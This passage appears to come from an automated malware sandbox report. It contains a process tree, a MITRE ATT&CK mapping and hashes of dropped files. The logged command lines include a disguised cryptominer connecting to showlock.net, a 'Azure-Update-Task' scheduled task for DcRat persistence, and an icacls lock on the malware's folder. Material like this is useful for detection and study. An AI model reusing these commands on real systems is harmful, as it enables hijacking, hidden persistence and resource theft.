      - C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 7db91b54-20e0-400d-941d-77d927154212 --tls --nicehash -o showlock.net:443 --rig-id 7db91b54-20e0-400d-941d-77d927154212 --tls --nicehash -o showlock.net:80 --rig-id 7db91b54-20e0-400d-941d-77d927154212 --nicehash --http-port 3433 --http-access-token 7db91b54-20e0-400d-941d-77d927154212 --randomx-wrmsr=-1
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2904
    - - C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
        5⤵
        Executes dropped EXE
        
        PID:588
    - - C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
        5⤵
        Executes dropped EXE
        
        PID:1784
- C:\Users\Admin\AppData\Local\Temp\rty25.exe
  "C:\Users\Admin\AppData\Local\Temp\rty25.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  PID:2244
- C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
  "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
  2⤵
  - DcRat
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  PID:2716

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240208044749.log C:\Windows\Logs\CBS\CbsPersist_20240208044749.cab
1⤵
- Drops file in Windows directory
PID:1996

C:\Users\Admin\AppData\Local\Temp\C40A.exe
C:\Users\Admin\AppData\Local\Temp\C40A.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2564

C:\Users\Admin\AppData\Local\Temp\DD84.exe
C:\Users\Admin\AppData\Local\Temp\DD84.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:880
- C:\Users\Admin\AppData\Local\Temp\DD84.exe
  C:\Users\Admin\AppData\Local\Temp\DD84.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Modifies system certificate store
  PID:912
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\8e8d35eb-7d56-44b8-acfa-1c01011057ad" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:2560
- - C:\Users\Admin\AppData\Local\Temp\DD84.exe
    "C:\Users\Admin\AppData\Local\Temp\DD84.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    PID:2368
  - - C:\Users\Admin\AppData\Local\Temp\DD84.exe
      "C:\Users\Admin\AppData\Local\Temp\DD84.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2804
    - - C:\Users\Admin\AppData\Local\42e34c31-bdd6-42ba-a894-da887f5bb347\build2.exe
        
        "C:\Users\Admin\AppData\Local\42e34c31-bdd6-42ba-a894-da887f5bb347\build2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1740
      - C:\Users\Admin\AppData\Local\42e34c31-bdd6-42ba-a894-da887f5bb347\build2.exe
        
        "C:\Users\Admin\AppData\Local\42e34c31-bdd6-42ba-a894-da887f5bb347\build2.exe"
        6⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:2124
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1424
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:2456
    - - C:\Users\Admin\AppData\Local\42e34c31-bdd6-42ba-a894-da887f5bb347\build3.exe
        
        "C:\Users\Admin\AppData\Local\42e34c31-bdd6-42ba-a894-da887f5bb347\build3.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1720
      - C:\Users\Admin\AppData\Local\42e34c31-bdd6-42ba-a894-da887f5bb347\build3.exe
        
        "C:\Users\Admin\AppData\Local\42e34c31-bdd6-42ba-a894-da887f5bb347\build3.exe"
        6⤵
        Executes dropped EXE
        
        PID:320
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        DcRat
        Creates scheduled task(s)
        
        PID:2756

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1632

C:\Users\Admin\AppData\Local\Temp\6AD6.exe
C:\Users\Admin\AppData\Local\Temp\6AD6.exe
1⤵
- Executes dropped EXE
PID:2504
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 96
  2⤵
  - Loads dropped DLL
  - Program crash
  PID:3056

C:\Windows\system32\taskeng.exe
taskeng.exe {58E11122-03CE-42FF-BD28-4011923BA362} S-1-5-21-1603059206-2004189698-4139800220-1000:AILVMYUM\Admin:Interactive:[1]
1⤵
PID:2844
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2860
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    - Executes dropped EXE
    PID:1996
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:2692
- C:\Users\Admin\AppData\Roaming\cjcwfvs
  C:\Users\Admin\AppData\Roaming\cjcwfvs
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1060
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2328
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    - Executes dropped EXE
    PID:2212
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2584
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    - Executes dropped EXE
    PID:2768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
267f3fbb231876ea1b3de1b8aaea1917

SHA1
df0843fb7137e7e81e449ba3c05168fe892ffa78

SHA256
5157427e4c6e429f14a19cec39e30d37b17040ca86886879c0315d157e7b90d5

SHA512
dec882dbb4505cce10525f935a90c2a87552ddc08701e3faa8de7561dea23f4c029142154b6818e0a50599a2e3341fb12b5c4554d06a0ee5f2ab07941eeecc61

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
db4dad503812b0a1d87ebf728f624da0

SHA1
d8508cf4e74d28947ea5c83a3cc5c218c3021f25

SHA256
0b9f6ce1bed09f566cb70951d137c3404a3d19bbd1f530c36d0927a270d3fdfa

SHA512
81965d86a4f383cede46277f063a5be52fed2f57084994fd4c7f077aa95e614f977d46d7351b856e6e5dc3bdb0df51ca38cc7a3cafa9e49077b1795af6347fbf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
362fa9a7e56a9adce4775e0e256a5026

SHA1
97b58060fd83502789cc0d7ae2c675383c78fc82

SHA256
99d40390d1f5020a05007bd07467ed4143a31313b5cf858d5c6a6551e61044bb

SHA512
fbac00586b951dd0b197b3f5bae8916db9b10665985a1aa40827ce4b895f8d74a591b062b50ed1089b1332b51dd7d7f733ce7899832cad43cd3a081cdd178267

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b103bc60e19a956d134ee311b4a798cb

SHA1
21841e40ab25301ad156ee6e32a10fef4451723f

SHA256
e8c891f3a0087feea5ec365432c34ee98378734f4b9c37f1da141ae14dcd9854

SHA512
b4df88fedec8e830389a513205961f12fb367b64d7680767fcc78930ca17d8658e5148f2213760e5182d68860bf2f0cafaefdf6e781444dd8ff43b2924703017

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
0ec1b29c7e1c3938ba52d9c0ce50bbb8

SHA1
21debb42a1c5bc6350ad4b2ec18426f3d1bfd8ed

SHA256
e085a07cc522a7a0fde2a9fe5e5a5c13fefb66e4a85eb658b8884d9d5428ce00

SHA512
17b387924950e00868ab4f4c7a10653409c2c654e40ea2e3e0a710ef9b524a64f8a195053dcad524c8e7501009b11c5cf5a9f49b539c24113d78b394a5e9e67a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
362ebd8382e2e4ac72086878309fd040

SHA1
1411cf0e2de676b973154a1cfcabc335f4e66af5

SHA256
3fb5f823260543b0d6ca9d582db452cf65b41b8b344e357a6911335cf76f8793

SHA512
c54d9512f54dc4907044738c4bcf12bcfbd51e0b0086bf7e575f5742bfc27a3f445f80341bd37770046a291b9032f115086c0670f4ffeeb20e1990a1f46ff0e2

Download Submit
C:\Users\Admin\AppData\Local\42e34c31-bdd6-42ba-a894-da887f5bb347\build2.exe

Filesize
192KB

MD5
0be8c8a5c3b881997ae9fbebd5e61f36

SHA1
c8025f6c4a4af88642e553b7833816b467314ff8

SHA256
5f2c815ed53c1cc625b5bc83767aaab5309e5be79e6bad45e2b36f63ca932484

SHA512
30dcd186ad3d554be918a352ef7a85cf031cae22e0bc8eb35249df9033262554d3f52f0b4ca8d688a556bd9b3342a134a799bc00de2c340b639a5ab816890c58

Download Submit
C:\Users\Admin\AppData\Local\42e34c31-bdd6-42ba-a894-da887f5bb347\build3.exe

Filesize
299KB

MD5
41b883a061c95e9b9cb17d4ca50de770

SHA1
1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad

SHA256
fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408

SHA512
cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

Download Submit
C:\Users\Admin\AppData\Local\Temp\C40A.exe

Filesize
234KB

MD5
d1b4b083e0ea20a087018bde31c37a75

SHA1
fe5a597a8a0dcf26204e99ef8f7abf2c9359e47f

SHA256
a578ab8f490d32d4ec916f02ce6ed22ef4572bf21db481dcce5b1b2ccf228d92

SHA512
30d41aa90f517119ac77ac0cc9fc86d6f17ccde315dfd05cdbbc7b27e38039a3c2772583c8cf206c21f5a92980cbf1a64f759b364529f88cbdaaa4d85350eb6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab73EA.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\DD84.exe

Filesize
733KB

MD5
5b127dfb33460a1a7f49309e53e5074c

SHA1
2f372ad5bfe1395f703dfe0f63980bad366c726e

SHA256
e701ffa4d637b5a0dce41b547d1c7447a9fdc36198cd83c22a22a983ea828d40

SHA512
900a9ad9ac8c4dcc6db655d38498b2c2480a4525adfb590ed726d32ca876d89c6dc0565ec370e6a0b06eabdb2e14745c7a7e2b62e49fc05d5ab1354296eb785f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

Filesize
8.3MB

MD5
fd2727132edd0b59fa33733daa11d9ef

SHA1
63e36198d90c4c2b9b09dd6786b82aba5f03d29a

SHA256
3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

SHA512
3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

Filesize
492KB

MD5
fafbf2197151d5ce947872a4b0bcbe16

SHA1
a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020

SHA256
feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71

SHA512
acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7573.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
896KB

MD5
14cffd1df94d9c386cd79b6b73434753

SHA1
e89fbcf94160a59495e8bdfe9d141a1c3753ce82

SHA256
0eaa9703b3ebe1b37ba376846fc52e41b3ce1ce332adb6f4ff48391bea2ba9f4

SHA512
0b86a18bb80b6acbbf13112524498c600ebfd3277ef2752042cf854527171d670fa6d5624aedad59b7f6568e0c2d6d5d2a7f498c5b4fbc97cb994ddc7e37063f

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
2.8MB

MD5
713674d5e968cbe2102394be0b2bae6f

SHA1
90ac9bd8e61b2815feb3599494883526665cb81e

SHA256
f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

SHA512
e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Filesize
2.0MB

MD5
dcb505dc2b9d8aac05f4ca0727f5eadb

SHA1
4f633edb62de05f3d7c241c8bc19c1e0be7ced75

SHA256
61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

SHA512
31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe

Filesize
4.0MB

MD5
400d5dede98a9a5360c25cfe64e30cc7

SHA1
b55141b1064d634eef78dafedf4cd46a51f2427c

SHA256
7cdcd8305523c71c771cafa5c2f1e225011243576ad606a622990dfbe20b0064

SHA512
7066a46d952188d3b5696a4d9a4e2b332c28ad2e428b0ae79205fc8f6e39e1dbfea5ad85429c30ac969788a2aaa85824dae5b7ed0ce26ea21407755ebb554012

Download Submit
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe

Filesize
768KB

MD5
8ef6614c2044ef99f3a9813638b7e98c

SHA1
315231dfc448f8161e489d8db39900bbcdae3a7c

SHA256
64ab4337aba81400c5673b621b4414c611ed685e8084fe74954276ef24d0ace3

SHA512
6df09b9a478afba44866c2ab55df90a57198a4d1992e26d5c5a7677fff07956af05800742067a9450892613850e47de0ebdf39154a95d114c49457f9dc70bdca

Download Submit
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe

Filesize
448KB

MD5
4a55e73fdc90ba552d1ce23cd9371ccb

SHA1
bdfc116cc0a3e34b358e2c29ba7905e31b0e1dc0

SHA256
86bb8be29e78f1dc0a910feffd3cf93278f7701cb3dc21b491f5a2a04384206b

SHA512
6c37addc21592c5136daf65c825606dd9798aa8502428847ee90ef294da91f255cd5ae3cd56d0186ed13e43027eb9cc16c7186902190800178c38d396a59535b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
640KB

MD5
69f8a85c48ba9c7ffbd87e4c0c856067

SHA1
137a3b98ef4e59aae5b50339204839b3aa147df0

SHA256
ebdb9e62caf8cf6eebb71850d0e4a053208ac878eb65e3cf23172d1c2a69d9ac

SHA512
e7f2497dd36eccc10cf83d427e8ea42f0d57044881b866f8bf8b30659fd5f3dd4ca18fee571e85c26ca422fc262c4e954279ef5253a0f09dd2bc5cf98b1b538a

Download Submit
C:\Users\Admin\AppData\Local\Temp\osloader.exe

Filesize
591KB

MD5
e2f68dc7fbd6e0bf031ca3809a739346

SHA1
9c35494898e65c8a62887f28e04c0359ab6f63f5

SHA256
b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

SHA512
26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

Download Submit
C:\Users\Admin\AppData\Local\Temp\u21k.0.exe

Filesize
245KB

MD5
6bcb57185d8d60e412c18a77c073c282

SHA1
30dfe3fe86a5262fa6541f9f341dbf64257b3cd1

SHA256
273c007885a368407eb619a50c605396aa279e46c5ab89de04a0e75540a157c4

SHA512
37eeaf3bb36ecfea89cd800f8bdff9b821b76c557f503f84da5ca36e4ddea0fb06b493e13cbb4bb1e70827eb07ec2329c9d3fa8d270a716b7009e9dcd19332ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\u21k.1.exe

Filesize
832KB

MD5
493aaadcde8cc6b5c52ac667397b90f7

SHA1
2e00ab93263174991fdf98db28f513a50e43ea0c

SHA256
67b68339c2c694cf43321c5f039a5a23fbfa015fe5ef221d5e4260f1bc0e4d7c

SHA512
f9289fc0734b29060d8fe3b5c0060c79cf9831d56642f09810231d01363a9e4c82522385ec6078cd7b4fda30f436e7acb50636add20c4385b83142727c832716

Download Submit
C:\Users\Admin\AppData\Local\Temp\u21k.1.exe

Filesize
320KB

MD5
7e16dda41b2ae464d9612815f0d3d6eb

SHA1
1b2486381b4e1cade80e200638f64d9fc4693ed5

SHA256
492a2edab7086f7989f9fb74f662683b7a12f47691c04ee6c764e335a0cbf2b1

SHA512
4549699fa1fdb320b22b5ac456a72d219c09a83b11cccdb9d49cfac26428721b710873304cc7109a6802bd79b52325ff6380e55c5b14a42dda6b1221c4f8e72b

Download Submit
C:\Users\Admin\AppData\Roaming\Temp\Task.bat

Filesize
128B

MD5
11bb3db51f701d4e42d3287f71a6a43e

SHA1
63a4ee82223be6a62d04bdfe40ef8ba91ae49a86

SHA256
6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331

SHA512
907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

Download Submit
C:\Windows\rss\csrss.exe

Filesize
512KB

MD5
1000f8add1d07a5fc4032eaf4d99cdb2

SHA1
7a43e6d6af56a4bb6dc274c26b7ffe6c102f6c77

SHA256
c645baf895881d7924d6332a26090e2649daec5fe058963f7be0c674e5c00231

SHA512
b4bbc81fcc1b9b5bdcf7c40a7857bf96e07168f765c61340750f47c68a8954f41cc972b26bf1c46ab74cb6ab416af0e3ff3a2dbfad0767e04d8f56986a9bca0e

Download Submit
C:\Windows\rss\csrss.exe

Filesize
4.2MB

MD5
66560a15081c9dee9fed498d5f0a25a9

SHA1
fbd7626525777262423fb9beea1e5b7e50fda2b5

SHA256
11e2cfb1fb58a3f69826d5bc36e88fde44c53def20891739ea7054eaabf24551

SHA512
dbd84583c6248db88452ef12074aa668ee982a9fe18484611a1b6d67a7233f9f3fca466bc843dfbc227099a5fd67af24c98f2d5408b26f8cf9fd635f7c70ba07

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
\Users\Admin\AppData\Local\42e34c31-bdd6-42ba-a894-da887f5bb347\build2.exe

Filesize
320KB

MD5
698128efcd00cd992543f5efe720b664

SHA1
cae1caffe79c76f954f8c3d8d060b54e9eb7aea4

SHA256
e72332c6f01bc37d102fd2124d380429e6d1a15fa55556a798ec8fb276668a37

SHA512
5c09e9123753dbd13085cb9c722b58d7bb6c64597ef5e44ed58ee50b7132fccd0bd3912f24440944925927e27586ece4a09a9deb4f90caddcabfb70c54cf1e22

Download Submit
\Users\Admin\AppData\Local\Temp\DD84.exe

Filesize
64KB

MD5
a2c675fe9a55da427b30cfd30f89946f

SHA1
e6c38bd3b79b05aa665c088528b5b7fa406af1ce

SHA256
af115119cb1cfefa8856e7168c2df915aa25b4950e35f12cc79ab8984b9609a6

SHA512
2b57bebf98e27ebc0796f3cd602024e0fa039fd8cf57afba1a1ae836f3ece64193a314bb41bb4abdf523390bc008e4c983589471dfc2fd6968e96c5d873825f1

Download Submit
\Users\Admin\AppData\Local\Temp\InstallSetup_nine.exe

Filesize
419KB

MD5
654abe1db0f972272b5b012914d9e5d6

SHA1
1ac7b42167369dcfa528837f13a2c80de7bcc161

SHA256
5f2bdf7f83ab075f7dafaf7493cbf4ab08d2e79b95cd3382621acfe73ba96094

SHA512
18823ab8a9a160ac169052ec210e6adb356190dc0644c8b5fd6f5ccbc8de2666c5e9d44ef90c954d5b6e948c81ef2666900c0fe40b7d5e4b644a39e8b93c1a12

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

Filesize
94KB

MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe

Filesize
5KB

MD5
756c94ff36b1baba358348180eb30ee3

SHA1
03d5af8bdc77548ca46ac583af1644c0e0fc27cd

SHA256
e6adc22c13f72fb7a2c4d4a718a6280acc693e88bcfdf52c38844dfa0b5ae340

SHA512
9eec7a9f05403edfa7af7245431abdbe49ff7a5989e1d165757c13fbae532a4d41e1bc0ae59c3cc8523cb64adae8c375a2dab88eb6484c0fcaab011aa97a1de6

Download Submit
\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe

Filesize
2KB

MD5
1b571b8969daee34afdc62392d6536da

SHA1
3b1aae5b42b14dad60198588c226c83600319642

SHA256
6dd91049ae6f6643e20ddb845accaa593ab0d57c98d8ff6f87d1459a48666eed

SHA512
65f791c1b7ce1f1b7f36415f036d89ac85dbada2be59ad60791ee61a4609279d41a16dbc3a821e7bc4afe3d02bb444ebf2760fdbf54052a7146af35ecc8fe64f

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll

Filesize
1.5MB

MD5
f0616fa8bc54ece07e3107057f74e4db

SHA1
b33995c4f9a004b7d806c4bb36040ee844781fca

SHA256
6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

SHA512
15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
768KB

MD5
c57adb108b46367c84c37970c98fa511

SHA1
a63521693cef3f95d4a7f9cb9324f85b1db4966b

SHA256
34d0c1e164cc464b49d53d0565d20dc6f29b611405995ef853114d76a07f6aed

SHA512
15aa946dcdb5b4b160d73fbcd4983bf930327af017a51da593776722a1b54bd5b72bceef7c7e128f0a78be6be07f73cc1e7445423760795d8525371f494e6273

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Filesize
704KB

MD5
0138459f3682fb6f7347606919af5b8f

